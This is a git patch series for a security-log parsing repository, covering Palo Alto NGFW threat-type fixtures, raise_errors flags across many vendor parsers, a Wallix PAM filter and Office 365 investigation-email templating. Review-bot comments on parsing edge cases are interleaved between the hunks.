"xxxxxxxxxxxxxx" } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json index 1621cfeed..3445ddc4f 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json @@ -49,7 +49,8 @@ "serial_number": "026701002040" }, "paloalto": { - "Threat_ContentType": "end" + "Threat_ContentType": "end", + "VirtualLocation": "vsys1" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json index 324587ad2..3238eb5e4 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json 
@@ -49,7 +49,8 @@ "serial_number": "1801017000" }, "paloalto": { - "Threat_ContentType": "deny" + "Threat_ContentType": "deny", + "VirtualLocation": "vsys1" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json index f3a6b58d6..41d495725 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json @@ -77,6 +77,25 @@ }, "paloalto": { "DirectionOfAttack": "server to client", + "PanOSContainerName": "pan-dp-77754f4", + "PanOSContainerNameSpace": "pns_default", + "PanOSDestinationDeviceCategory": "L-Phone", + "PanOSDestinationDeviceHost": "pan-506", + "PanOSDestinationDeviceMac": "150083646537", + "PanOSDestinationDeviceModel": "Note XT", + "PanOSDestinationDeviceOSFamily": "K8", + "PanOSDestinationDeviceOSVersion": "Android v8", + "PanOSDestinationDeviceProfile": "l-profile", + "PanOSDestinationDeviceVendor": "Lenovo", + "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx", + "PanOSSourceDeviceHost": "pan-505", + "PanOSSourceDeviceModel": "Note 4G", + "PanOSSourceDeviceProfile": "l-profile", + "PanOSSourceDeviceVendor": "Lenovo", + "PanOSSourceDynamicAddressGroup": "blue_dag", + "PanOSSourceLocation": "west-coast", + "URLCategory": "sports", + "VirtualLocation": "vsys1", "endpoint": { "serial_number": "xxxxxxxxxxxxxx" } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json index ea8e442b5..c90ab6ed6 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json @@ -53,6 +53,10 @@ "vendor": "Palo Alto Networks", "version": "2.0" }, + "paloalto": { + "VirtualLocation": "vsys1", + "VirtualSystemID": "1" + }, "related": { "hosts": [ "PA-5220" 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json index 8c7d37227..edd76521b 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json @@ -60,8 +60,13 @@ "serial_number": "111111111111" }, "paloalto": { + "DGHierarchyLevel1": "997", + "DGHierarchyLevel2": "738", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "DirectionOfAttack": "server to client", "Threat_ContentType": "wildfire", + "VirtualLocation": "vsys1", "endpoint": { "serial_number": "xxxxxxxxxxx" }, From ae46b7e574ba9332d7863150339a90ab6ede15c7 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Thu, 31 Oct 2024 12:21:33 +0200 Subject: [PATCH 191/317] Avoid disabled jinja functions --- Palo Alto Networks/paloalto-ngfw/ingest/parser.yml | 14 +++++++------- .../paloalto-ngfw/tests/test_ldap_brute_force.json | 3 ++- .../paloalto-ngfw/tests/test_threat.json | 3 ++- .../paloalto-ngfw/tests/test_threat_02.json | 3 ++- .../paloalto-ngfw/tests/threat-url-xff.json | 3 ++- .../paloalto-ngfw/tests/threat_csv.json | 3 ++- 6 files changed, 17 insertions(+), 12 deletions(-) diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index d82b5d2f1..9add94a53 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml 
@@ -733,21 +733,21 @@ stages:
 - set:
 paloalto.threat.type: >
 {%- set id = parsed_threat.message.threat_code | int -%}
- {%- if id in range(8000, 8100) -%}
+ {%- if 8000 <= id < 8100 -%}
 {%- set name = 'scan detection' -%}
- {%- elif id in range(8500, 8600) -%}
+ {%- elif 8500 <= id < 8600 -%}
 {%- set name = 'flood detection' -%}
 {%- elif id == 9999 -%}
 {%- set name = 'URL filtering log' -%}
- {%- elif id in range(10000, 20000) -%}
+ {%- elif 10000 <= id < 20000 -%}
 {%- set name = 'spyware phone home detection' -%}
- {%- elif id in range(20000, 30000) -%}
+ {%- elif 20000 <= id < 30000 -%}
 {%- set name = 'spyware download detection' -%}
- {%- elif id in range(30000, 45000) -%}
+ {%- elif 30000 <= id < 45000 -%}
 {%- set name = 'vulnerability exploit detection' -%}
- {%- elif id in range(52000, 53000) -%}
+ {%- elif 52000 <= id < 53000 -%}
 {%- set name = 'filetype detection' -%}
- {%- elif id in range(60000 , 70000) -%}
+ {%- elif 60000 <= id < 70000 -%}
 {%- set name = 'data filtering detection' -%}
 {%- endif -%}
 {{name | default('custom threat')}}
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json b/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json
index aab8fbd6b..f569f8246 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json
@@ -59,7 +59,8 @@
 "VirtualLocation": "vsys1",
 "threat": {
 "id": "40005",
- "name": "LDAP: User Login Brute Force Attempt"
+ "name": "LDAP: User Login Brute Force Attempt",
+ "type": "vulnerability exploit detection"
 }
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json b/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json
index 48dc1f1bd..51579bdcb 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json
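Review bot: The threat-ID buckets in `paloalto.threat.type` carry no comment saying where their boundaries come from, and an ID in one of the uncovered spans (45000–51999, 53000–59999, 70000 and above) silently becomes `custom threat` through the `default` filter, as does a missing or non-numeric `threat_code`, which `| int` turns into 0. The rewrite to `8000 <= id < 8100`-style comparisons is the right replacement for the disabled `range`, but a one-line comment above the `set`, such as `# Threat ID buckets; IDs outside them fall back to 'custom threat' — confirm boundaries against the vendor threat-ID reference`, would stop the next maintainer from reading the gaps as accidental. The fixtures added in this commit only pin IDs inside existing buckets; one with an ID in a gap would pin the fallback as well.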
@@ -54,7 +54,8 @@ "Threat_ContentType": "url", "VirtualLocation": "vsys1", "threat": { - "id": "9999" + "id": "9999", + "type": "URL filtering log" } }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json b/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json index e45d01607..eadb40265 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json @@ -65,7 +65,8 @@ "VirtualLocation": "vsys1", "threat": { "id": "95187", - "name": "Palo Alto Networks GlobalProtect OS Command Injection Vulnerability" + "name": "Palo Alto Networks GlobalProtect OS Command Injection Vulnerability", + "type": "custom threat" } }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json b/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json index b6430085e..57cb1121b 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json @@ -67,7 +67,8 @@ "VirtualLocation": "vsys", "VirtualSystemName": "VSYS", "threat": { - "id": "9999" + "id": "9999", + "type": "URL filtering log" } }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json index 571880744..20a78b306 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json @@ -59,7 +59,8 @@ "VirtualLocation": "vsys", "threat": { "id": "34805", - "name": "PDF Exploit Evasion Found" + "name": "PDF Exploit Evasion Found", + "type": "vulnerability exploit detection" } }, "related": { From cb3e8051f3659825e515c09a49a008d51cdf033f Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 5 Nov 2024 17:14:08 +0200 Subject: [PATCH 192/317] Add connector info to VadeSecure M365 --- VadeSecure/vade_secure_m365/_meta/manifest.yml | 2 ++ 1 file changed, 2 insertions(+) 
diff --git a/VadeSecure/vade_secure_m365/_meta/manifest.yml b/VadeSecure/vade_secure_m365/_meta/manifest.yml index 8c6e799a6..da4658b6a 100644 --- a/VadeSecure/vade_secure_m365/_meta/manifest.yml +++ b/VadeSecure/vade_secure_m365/_meta/manifest.yml @@ -1,6 +1,8 @@ uuid: e4a758fc-7620-49e6-b8ed-b7fb3d7fa232 name: Vade for M365 slug: vade-m365 +automation_connector_uuid: aa1f6d1a-8821-467f-9801-a5293ed37616 +automation_module_uuid: 1411df5b-5de1-40bd-a988-725cfe692aff description: >- Vade for M365 offers all protections from Vade to our Microsoft 365 Email service data_sources: From e3efa726bbbc5e423677c855d3287a3d8d717001 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 6 Nov 2024 12:26:50 +0200 Subject: [PATCH 193/317] Add `raise_errors` --- RSA/rsa-securid/ingest/parser.yml | 1 + Retarus/retarus_email_security/ingest/parser.yml | 2 ++ .../skyhigh_secure_web_gateway/ingest/parser.yml | 1 + SonicWall/sonicwall-fw/ingest/parser.yml | 2 ++ Sophos/sophos edr/ingest/parser.yml | 5 +++++ Squid/squid/ingest/parser.yml | 1 + Systancia/cleanroom/ingest/parser.yml | 1 + Tehtris/tehtris-edr/ingest/parser.yml | 1 + ThinkstCanary/thinkst-canary/ingest/parser.yml | 1 + Umbrella/umbrella-proxy/ingest/parser.yml | 1 + Veeam/veeam_backup/ingest/parser.yml | 1 + Wallix/wallix-bastion/ingest/parser.yml | 1 + Wallix/wallix-bastion/tests/cron.json | 3 +-- Wallix/wallix-bastion/tests/pam_unix.json | 3 +-- WatchGuard/watchguard-firebox/ingest/parser.yml | 1 + Windows/windows/ingest/parser.yml | 8 ++++++++ WithSecure/withsecure-elements/ingest/parser.yml | 2 ++ 17 files changed, 31 insertions(+), 4 deletions(-) diff --git a/RSA/rsa-securid/ingest/parser.yml b/RSA/rsa-securid/ingest/parser.yml index c70fee596..451c6f163 100644 --- a/RSA/rsa-securid/ingest/parser.yml +++ b/RSA/rsa-securid/ingest/parser.yml @@ -4,6 +4,7 @@ pipeline: external: name: dsv.parse-dsv properties: + raise_errors: false input_field: original.message output_field: message columnnames: 
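Review bot: `raise_errors: false` on the `dsv.parse-dsv` stage presumably turns a parse failure into an empty `message` instead of a pipeline error, so an RSA line that does not fit `columnnames` now flows through every later stage with no parsed fields and, as far as this hunk shows, no trace that parsing failed. The same flag is added to the grok and kv stages of the Retarus, Skyhigh, SonicWall, Sophos, Squid, Systancia, Tehtris, ThinkstCanary, Umbrella, Veeam, WatchGuard, Windows and WithSecure parsers in this commit, and the same question applies to each: the `set` stages that read the `message`, `result` or `event` output fields must now tolerate their absence. For stages like this one, where the parser covers the whole `original.message`, a fixture with a non-matching input would pin what a degraded event looks like and keep the silent path visible to whoever builds detections on these fields. A stage-level `description:` such as `description: non-matching input is passed through unparsed (raise_errors: false)` would record the intent next to the flag.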
diff --git a/Retarus/retarus_email_security/ingest/parser.yml b/Retarus/retarus_email_security/ingest/parser.yml index 6bd68803a..f55fa8ea7 100644 --- a/Retarus/retarus_email_security/ingest/parser.yml +++ b/Retarus/retarus_email_security/ingest/parser.yml @@ -7,6 +7,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: json_event.message.sender output_field: sender pattern: "^%{GREEDYDATA:username}@%{GREEDYDATA:domain}$" @@ -15,6 +16,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: json_event.message.recipient output_field: recipient pattern: "^%{GREEDYDATA:username}@%{GREEDYDATA:domain}$" diff --git a/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml b/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml index 9fc2ec259..20b07e5f4 100644 --- a/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml +++ b/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml @@ -28,6 +28,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parse_kv.message.http_request_first_line}}" output_field: message pattern: "%{WORD:http_method} %{URL:url} HTTP/%{NUMBER:http_version}" diff --git a/SonicWall/sonicwall-fw/ingest/parser.yml b/SonicWall/sonicwall-fw/ingest/parser.yml index 8a913cd4e..03aa0ed21 100644 --- a/SonicWall/sonicwall-fw/ingest/parser.yml +++ b/SonicWall/sonicwall-fw/ingest/parser.yml @@ -35,6 +35,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.susr}}" output_field: result pattern: "(%{USER_WITH_DOMAIN}|%{GREEDYDATA:user_name})" @@ -47,6 +48,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.msg}}" output_field: result pattern: "(%{GREEDYDATA}[F|f]ilename: %{FILE:filename}%{GREEDYDATA})" 
diff --git a/Sophos/sophos edr/ingest/parser.yml b/Sophos/sophos edr/ingest/parser.yml index f7dc22739..c4779fa3f 100644 --- a/Sophos/sophos edr/ingest/parser.yml +++ b/Sophos/sophos edr/ingest/parser.yml @@ -9,6 +9,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: 'Access was blocked to "%{URL:url}" because of "%{WORD:rulename}".' @@ -19,6 +20,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "Controlled application %{WORD}: %{GREEDYDATA:process_title}" @@ -27,6 +29,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "%{REMOVABLE_STORAGE}|%{STORAGE}" @@ -38,6 +41,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "PUA %{GREEDYDATA:action}: '%{GREEDYDATA:threat}' at '%{GREEDYDATA:file_path}'" @@ -46,6 +50,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "'%{GREEDYDATA:threat}' exploit prevented in %{GREEDYDATA:category}" diff --git a/Squid/squid/ingest/parser.yml b/Squid/squid/ingest/parser.yml index f5b9de6f9..14c43d5d1 100644 --- a/Squid/squid/ingest/parser.yml +++ b/Squid/squid/ingest/parser.yml @@ -48,6 +48,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.url output_field: message pattern: "(%{IP:ip}|%{NOTSPACE:domain}):%{NUMBER:port}" diff --git a/Systancia/cleanroom/ingest/parser.yml b/Systancia/cleanroom/ingest/parser.yml index 0b80ff87c..44342010b 100644 --- a/Systancia/cleanroom/ingest/parser.yml +++ b/Systancia/cleanroom/ingest/parser.yml 
@@ -16,6 +16,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{event.result.event_reason}}" output_field: result pattern: "%{SESSION_SUCCESS}|%{SESSION_FAILURE}|%{PROCESS}" diff --git a/Tehtris/tehtris-edr/ingest/parser.yml b/Tehtris/tehtris-edr/ingest/parser.yml index cbcb244bb..aa8f22411 100644 --- a/Tehtris/tehtris-edr/ingest/parser.yml +++ b/Tehtris/tehtris-edr/ingest/parser.yml @@ -23,6 +23,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.description}}" pattern: "(%{APPLICATION_POLICY}|%{URL_DETECTED}|%{MALICIOUS_MACRO})" custom_patterns: diff --git a/ThinkstCanary/thinkst-canary/ingest/parser.yml b/ThinkstCanary/thinkst-canary/ingest/parser.yml index f8cada9ff..8ce315396 100644 --- a/ThinkstCanary/thinkst-canary/ingest/parser.yml +++ b/ThinkstCanary/thinkst-canary/ingest/parser.yml @@ -21,6 +21,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{parsed_event.message.DN}}" output_field: result value_sep: "=" diff --git a/Umbrella/umbrella-proxy/ingest/parser.yml b/Umbrella/umbrella-proxy/ingest/parser.yml index 790c57048..442c5da45 100644 --- a/Umbrella/umbrella-proxy/ingest/parser.yml +++ b/Umbrella/umbrella-proxy/ingest/parser.yml @@ -28,6 +28,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "event.message.http_request_url" output_field: message pattern: "(%{URIPROTO:url_scheme}://)?(?:%{URIHOST:url_domain})?(?:%{URIPATHPARAM:url_path})" diff --git a/Veeam/veeam_backup/ingest/parser.yml b/Veeam/veeam_backup/ingest/parser.yml index 5470c716c..7054d0a51 100644 --- a/Veeam/veeam_backup/ingest/parser.yml +++ b/Veeam/veeam_backup/ingest/parser.yml @@ -17,6 +17,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.UserName}}" output_field: user pattern: '%{GREEDYDATA:domain}\\%{GREEDYDATA:name}' 
diff --git a/Wallix/wallix-bastion/ingest/parser.yml b/Wallix/wallix-bastion/ingest/parser.yml
index ed76d3f43..d9f1be434 100644
--- a/Wallix/wallix-bastion/ingest/parser.yml
+++ b/Wallix/wallix-bastion/ingest/parser.yml
@@ -2,6 +2,7 @@ name: wallix-bastion
 ignored_values: ["-"]
 pipeline:
 - name: parsed_event
+ filter: '{{not original.message.startswith("pam_unix(")}}'
 external:
 name: kv.parse-kv
 properties:
diff --git a/Wallix/wallix-bastion/tests/cron.json b/Wallix/wallix-bastion/tests/cron.json
index da4487e2e..fdb9da3bc 100644
--- a/Wallix/wallix-bastion/tests/cron.json
+++ b/Wallix/wallix-bastion/tests/cron.json
@@ -15,7 +15,6 @@
 },
 "user": {
 "name": "root"
- },
- "wallix": {}
+ }
 }
 }
\ No newline at end of file
diff --git a/Wallix/wallix-bastion/tests/pam_unix.json b/Wallix/wallix-bastion/tests/pam_unix.json
index 5dd28b147..d7ce961b4 100644
--- a/Wallix/wallix-bastion/tests/pam_unix.json
+++ b/Wallix/wallix-bastion/tests/pam_unix.json
@@ -15,7 +15,6 @@
 },
 "user": {
 "name": "wabuser"
- },
- "wallix": {}
+ }
 }
 }
\ No newline at end of file
diff --git a/WatchGuard/watchguard-firebox/ingest/parser.yml b/WatchGuard/watchguard-firebox/ingest/parser.yml
index 23bdfd0d6..36e32c512 100644
--- a/WatchGuard/watchguard-firebox/ingest/parser.yml
+++ b/WatchGuard/watchguard-firebox/ingest/parser.yml
@@ -14,6 +14,7 @@ pipeline:
 external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: "{{parsed_event.message.msg}}"
 output_field: message
 pattern: "%{DHCP}|%{USER_LOG}"
diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml
index 988ae3dbc..5fc6b2eec 100644
--- a/Windows/windows/ingest/parser.yml
+++ b/Windows/windows/ingest/parser.yml
@@ -35,6 +35,7 @@ pipeline:
 external:
 name: kv.parse-kv
 properties:
+ raise_errors: false
 input_field: "{{json.event.Hashes or json.event.Hash}}"
 output_field: result
 value_sep: "="
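Review bot: The new `filter` only skips messages that begin exactly with `pam_unix(`, so a PAM line from another module (`pam_sss(`, `pam_ldap(`) or one with anything in front of the module name still reaches `kv.parse-kv`, and the empty `wallix: {}` that the cron.json and pam_unix.json fixtures stop expecting would reappear for those. If the intent is to bypass every PAM-formatted line, a check on the common prefix, `filter: '{{not original.message.startswith("pam_")}}'`, would cover the family at the same cost; whether that matches the bastion's actual log mix I cannot tell from here. The expression also dereferences `original.message` without a guard, so an event lacking that field is handled by the engine's undefined-value behaviour rather than by the filter. The `parsed_event` stage continues below the hunk.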
@@ -46,6 +47,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{json.event.Hashes or json.event.Hash}}" output_field: result value_sep: ":" @@ -84,6 +86,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json.event.IpAddress}}" output_field: event pattern: "%{GREEDYDATA}%{IPV4:ip}%{GREEDYDATA}" @@ -94,6 +97,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_message_kv.result.Contents}}" output_field: event pattern: >- @@ -105,6 +109,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json.event.url or json.event.RemoteName}}" output_field: event pattern: >- @@ -116,6 +121,7 @@ pipeline: name: grok.match description: #NEWLINE# is used because grok does not match multi-line fields and the KV stage does not support this field format. properties: + raise_errors: false input_field: '{{json.event.ContextInfo.replace(" "," ").replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}' output_field: event pattern: "%{CONTEXTINFO_FR}|%{CONTEXTINFO_EN}" @@ -128,6 +134,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: '{{json.event.Message.replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}' output_field: result pattern: >- @@ -139,6 +146,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: '{{json.event.Message.replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}' output_field: event pattern: >- diff --git a/WithSecure/withsecure-elements/ingest/parser.yml b/WithSecure/withsecure-elements/ingest/parser.yml index 83bd21cff..3f8525c4d 100644 --- a/WithSecure/withsecure-elements/ingest/parser.yml +++ b/WithSecure/withsecure-elements/ingest/parser.yml 
@@ -17,6 +17,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.details.userName}}" output_field: user pattern: "(%{DATA:domain}[/\\\\]+)?(%{USERNAME:name})" @@ -25,6 +26,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.userName}}" output_field: user pattern: "(%{DATA:domain}[/\\\\]+)?(%{USERNAME:name})" From ae8806c15f2905ce6b5333b2a4e82d8daa138ec9 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 6 Nov 2024 12:52:13 +0200 Subject: [PATCH 194/317] Fix linting --- Wallix/wallix-bastion/tests/session_integrity.json | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/Wallix/wallix-bastion/tests/session_integrity.json b/Wallix/wallix-bastion/tests/session_integrity.json index 39e8a6363..1c01481e9 100644 --- a/Wallix/wallix-bastion/tests/session_integrity.json +++ b/Wallix/wallix-bastion/tests/session_integrity.json @@ -6,13 +6,19 @@ "message": "[sessionintegrity] session_uid=\"1830c403be7caf0c00505688c380\" status=\"failed\" type=\"SSH_SHELL_SESSION\" user=\"adm@CORP.NET@1.1.1.1\" target=\"domain@local@target01.corp.net:SSH_1\" begin=\"2022-08-19 11:31:17\" end=\"2022-08-19 11:32:50\" files=[/var/wab/remote/recorded/ssh/2022-08-19/182b5714b466cba10050568e16d9,adm@CORP.NET@1.1.1.1,domain@target01.corp.net,20220819-113117,foo-bastion-bar.corp.net,1805.ttyrec]", "event": { "action": "SSH_SHELL_SESSION", - "category": ["session"], + "category": [ + "session" + ], "dataset": "session_integrity", "outcome": "failure", - "type": ["info"] + "type": [ + "info" + ] }, "related": { - "user": ["adm@CORP.NET@1.1.1.1"] + "user": [ + "adm@CORP.NET@1.1.1.1" + ] }, "user": { "name": "adm@CORP.NET@1.1.1.1" @@ -21,4 +27,4 @@ "type": "SSH_SHELL_SESSION" } } -} +} \ No newline at end of file From 249b9c59758763434b683213b533d0f411c8b822 Mon Sep 17 00:00:00 2001 
From: "vladyslav.guriev" Date: Wed, 6 Nov 2024 15:28:00 +0200 Subject: [PATCH 195/317] Fix: o365 investigation emails --- Office 365/o365/ingest/parser.yml | 37 +++- ...utomated_investigation_and_response_1.json | 170 ++++++++++++++++++ ...n_and_response_with_additional_fields.json | 1 + ...and_response_with_additional_fields_1.json | 18 +- ...tigation_and_response_with_attachment.json | 14 ++ 5 files changed, 237 insertions(+), 3 deletions(-) create mode 100644 Office 365/o365/tests/automated_investigation_and_response_1.json diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml index 67f475aad..61a06f847 100644 --- a/Office 365/o365/ingest/parser.yml +++ b/Office 365/o365/ingest/parser.yml @@ -498,7 +498,7 @@ stages: {%- for entity in action.Entities -%} { {%- if entity.AntispamDirection != null -%}"direction": "{{entity.AntispamDirection}}",{%- endif -%} - {%- if entity.NetworkMessageIds != null -%}"message_ids": "{{entity.NetworkMessageIds}}",{%- endif -%} + {%- if entity.NetworkMessageIds != null -%}"message_ids": {{entity.NetworkMessageIds}},{%- endif -%} {%- if entity.NetworkMessageId != null -%}"message_ids": ["{{entity.NetworkMessageId}}"],{%- endif -%} {%- if entity.Language != null -%}"language": "{{entity.Language}}",{%- endif -%} {%- if entity.DeliveryAction != null or entity.DeliveryLocation != null or entity.OriginalDeliveryLocation != null -%} 
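Review bot: Dropping the quotes around `{{entity.NetworkMessageIds}}` emits the list with Jinja's default rendering, which for a Python list is a single-quoted repr rather than JSON, so the result depends on how leniently the engine parses the rendered `emails` array; if strict JSON is expected, `"message_ids": {{entity.NetworkMessageIds | tojson}},` is the safe form. The same expression is repeated in the copied block added by the next hunk (@@ -511), so both places need the same treatment. The `NetworkMessageIds` and `NetworkMessageId` branches both write `"message_ids"`, so an entity carrying both keys yields a duplicate key in the rendered object; that is pre-existing, but worth a comment if the two are known to be exclusive. The template continues outside the hunk.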
@@ -511,8 +511,41 @@ stages: }, {%- endfor -%} {%- endfor -%} + + {%- for entity in parse_data.ParsedData.Entities -%} + {%- if entity.AntispamDirection != null or entity.NetworkMessageIds != null or entity.Language != null or entity.DeliveryAction != null or entity.DeliveryLocation != null or entity.OriginalDeliveryLocation != null -%} + { + {%- if entity.AntispamDirection != null -%}"direction": "{{entity.AntispamDirection}}",{%- endif -%} + {%- if entity.NetworkMessageIds != null -%}"message_ids": {{entity.NetworkMessageIds}},{%- endif -%} + {%- if entity.NetworkMessageId != null -%}"message_ids": ["{{entity.NetworkMessageId}}"],{%- endif -%} + {%- if entity.Language != null -%}"language": "{{entity.Language}}",{%- endif -%} + {%- if entity.DeliveryAction != null or entity.DeliveryLocation != null or entity.OriginalDeliveryLocation != null -%} + "delivery": { + {%- if entity.DeliveryAction!= null -%}"action": "{{entity.DeliveryAction}}",{%- endif -%} + {%- if entity.DeliveryLocation != null -%}"location": "{{entity.DeliveryLocation}}",{%- endif -%} + {%- if entity.OriginalDeliveryLocation -%}"original_location": "{{entity.OriginalDeliveryLocation}}",{%- endif -%} + }, + {%- endif -%} + }, + {%- endif -%} + {%- endfor -%} + ] + filter: '{{(json_event.message.get("Actions") != None and json_event.message.Actions | map("from_json") | rejectattr("Entities") | list | length != json_event.message.Actions | list | length) or parse_data.ParsedData.get("Entities", []) | length > 0}}' + + - set: + office365.investigation.emails: > + [ + {% set result = [] %} + {% for data in final.office365.investigation.emails %} + {% if data not in result %} + {% set result = result.append(data) %} + {% endif %} + {% endfor %} + {%- for data in result -%} + {{data}}, + {%- endfor -%} ] - filter: '{{json_event.message.get("Actions") != None and json_event.message.Actions | map("from_json") | rejectattr("Entities") | list | length != json_event.message.Actions | list | length}}' + filter: 
"{{final.office365.get('investigation', {}).get('emails', []) | length > 1}}" - set: office365.investigation.email.urls: '[{% for Property in parse_data.ParsedData.Entities %}{% for Url in Property.Urls %} "{{Url}}", {% endfor %}{% endfor %}]' diff --git a/Office 365/o365/tests/automated_investigation_and_response_1.json b/Office 365/o365/tests/automated_investigation_and_response_1.json new file mode 100644 index 000000000..fb46179f0 --- /dev/null +++ b/Office 365/o365/tests/automated_investigation_and_response_1.json 
